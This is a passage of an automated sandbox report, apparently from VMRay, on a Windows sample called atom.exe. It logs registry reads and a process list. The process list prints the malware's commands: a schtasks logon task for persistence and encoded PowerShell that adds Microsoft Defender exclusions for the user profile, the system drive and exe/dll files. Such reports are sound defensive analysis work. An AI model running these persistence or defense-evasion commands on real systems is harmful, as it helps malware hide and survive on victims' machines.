v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimRe

sponseHandling access applaunch.exe CLEAN

v4.0.30319\UseStrictRfcInterimResponseHandling access, read applaunch.exe CLEAN

v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions access applaunch.exe CLEAN

v4.0.30319\AllowDangerousUnicodeDecompositions access, read applaunch.exe CLEAN

v4.0.30319\System.Uri.UseStrictIPv6AddressParsing access applaunch.exe CLEAN

v4.0.30319\UseStrictIPv6AddressParsing access, read applaunch.exe CLEAN

v4.0.30319\System.Uri.AllowAllUriEncodingExpansion access applaunch.exe CLEAN

v4.0.30319\AllowAllUriEncodingExpansion access, read applaunch.exe CLEAN

v4.0.30319\SchUseStrongCrypto access, read applaunch.exe CLEAN

v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord access applaunch.exe CLEAN

v4.0.30319\SchSendAuxRecord access, read applaunch.exe CLEAN

v4.0.30319\SystemDefaultTlsVersions access, read applaunch.exe CLEAN

v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs access applaunch.exe CLEAN

v4.0.30319\RequireCertificateEKUs access, read applaunch.exe CLEAN

HKEY_CURRENT_USER access applaunch.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current

Version\Internet Settings\Connections access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current

Version\Internet Settings\Connections access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows

\CurrentVersion\Internet Settings access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access applaunch.exe CLEAN

LegacyWPADSupport access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Time Zones\W. Europe Standard Time access applaunch.exe CLEAN

NT\CurrentVersion\Time Zones\W. Europe Standard Time\TZI access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic

DST access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard

Time\MUI_Display access, read applaunch.exe CLEAN

NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Std access, read applaunch.exe CLEAN

NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Dlt access, read applaunch.exe CLEAN

NT\CurrentVersion access applaunch.exe CLEAN

(30)

Registry Key Operations Parent Process Name Verdict HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\ProductName access, read applaunch.exe CLEAN

NT\CurrentVersion\CSDVersion access, read applaunch.exe CLEAN

v4.0.30319\WMIDisableCOMSecurity access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\Sta

rtMenuInternet access applaunch.exe CLEAN

rtMenuInternet\IEXPLORE.EXE access, read applaunch.exe CLEAN

rtMenuInternet\IEXPLORE.EXE\shell\open\command access, read applaunch.exe CLEAN

Version\Uninstall access applaunch.exe CLEAN

Version\Uninstall\AddressBook access applaunch.exe CLEAN

Version\Uninstall\AddressBook\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\AddressBook\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\Connection Manager access applaunch.exe CLEAN

Version\Uninstall\Connection Manager\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\Connection Manager\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\DirectDrawEx access applaunch.exe CLEAN

Version\Uninstall\DirectDrawEx\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\DirectDrawEx\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\Fontcore access applaunch.exe CLEAN

Version\Uninstall\Fontcore\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\Fontcore\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\IE40 access applaunch.exe CLEAN

Version\Uninstall\IE40\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\IE40\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\IE4Data access applaunch.exe CLEAN

Version\Uninstall\IE4Data\DisplayName access, read applaunch.exe CLEAN

(31)

Registry Key Operations Parent Process Name Verdict HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current

Version\Uninstall\IEData\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\IEData\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\MobileOptionPack access applaunch.exe CLEAN

Version\Uninstall\MobileOptionPack\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\MobileOptionPack\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\SchedulingAgent access applaunch.exe CLEAN

Version\Uninstall\SchedulingAgent\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\SchedulingAgent\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\WIC access applaunch.exe CLEAN

Version\Uninstall\WIC\DisplayName access, read applaunch.exe CLEAN

Version\Uninstall\WIC\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{0FA68574-690B-4B00-89AA-B28946231449} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{0FA68574-690B-4B00-89AA-

B28946231449}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{0FA68574-690B-4B00-89AA-

B28946231449}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}

\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}

\DisplayVersion access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{1D8E6291-

B0D5-35EC-8441-6616F567A0F7}.KB2151757 access applaunch.exe CLEAN

B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName

access, read applaunch.exe CLEAN

B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayVersion access, read applaunch.exe CLEAN

B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName access, read applaunch.exe CLEAN

(32)

Version\Uninstall\{1D8E6291-

B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayVersion

access, read applaunch.exe CLEAN

Version\Uninstall\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{2BC3BD4D-

FABA-4394-93C7-9AC82A263FE2}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{2BC3BD4D-

FABA-4394-93C7-9AC82A263FE2}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current access applaunch.exe CLEAN

(33)

Version\Uninstall\{65e650ff-30be-469d-

b63a-418d71ea1765}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{65e650ff-30be-469d-

b63a-418d71ea1765}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{6913e92a-b64e-41c9-a5e6-cef39207fe89} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{6913e92a-b64e-41c9-a5e6-

cef39207fe89}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{6913e92a-b64e-41c9-a5e6-

cef39207fe89}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{710f4c1c-

cc18-4c49-8cbf-51240c89a1a2}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{710f4c1c-

cc18-4c49-8cbf-51240c89a1a2}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{90160000-008C-0000-0000-0000000FF1CE} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}

Version\Uninstall\{90160000-008C-0409-0000-0000000FF1CE} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{92FB6C44-E685-45AD-9B20-

CADF4CABA132}.KB4503575 access applaunch.exe CLEAN

CADF4CABA132}.KB4503575\DisplayName access, read applaunch.exe CLEAN

CADF4CABA132}.KB4503575\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

Version\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\

{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName access, read applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Uninstall\

{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayVersion access, read applaunch.exe CLEAN

Version\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} access applaunch.exe CLEAN

(34)

Reduced dataset Process

Process Name Commandline Verdict

atom.exe "C:\Users\kEecfMwgj\Desktop\atom.exe" MALICIOUS

applaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" SUSPICIOUS

build.exe "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe" SUSPICIOUS

cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:

\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" ^SUSPICIOUS

schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:

\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" ^SUSPICIOUS

services.exe C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe SUSPICIOUS

cmd.exe

"cmd" cmd /c powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAa QBvAG4AUABhAHQAaAAgAEAAK...

...BuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIAB AACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit

CLEAN

powershell.exe

powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAa QBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlA CwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

CLEAN

powershell.exe

powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAa QBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAn ACkAIAAtAEYAbwByAGMAZQA="

CLEAN

cmd.exe "cmd" cmd /c "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe" CLEAN

(35)

YARA / AV

No YARA or AV matches available.

(36)

ENVIRONMENT

Virtual Machine Information

Platform Information

Software Information

System Information

Name win7_64_sp1_en_mso2016

Description win7_64_sp1_en_mso2016

Architecture x86 64-bit

Operating System Windows 7

Kernel Version 6.1.7601.18741 (2e37f962-d699-492c-aaf3-f9f4e9770b1d) Network Scheme Name Local Gateway

Network Config Name Local Gateway

Platform Version 4.4.0

Dynamic Engine Version 4.4.0 / 12/08/2021 19:04

Static Engine Version 4.4.0.0 / 2021-12-08 18:00:20

AV Exceptions Version 4.4.1.6 / 2021-12-14 15:06:27 Link Detonation Heuristics Version 4.4.1.7 / 2021-12-15 19:11:26

Smart Memory Dumping Rules

Version 4.4.0.0 / 2021-12-08 18:00:20

Signature Trust Store Version 4.4.1.6 / 2021-12-14 15:06:27 VMRay Threat Identifiers Version 4.4.1.7 / 2021-12-15 19:11:26

YARA Built-in Ruleset Version 4.4.1.7

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

Microsoft Office Version 16.0.4266.1003

Hangul Office Not installed

Hangul Office Version Not installed

Internet Explorer Version 8.0.7601.17514

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed

Sample Directory C:\Users\kEecfMwgj\Desktop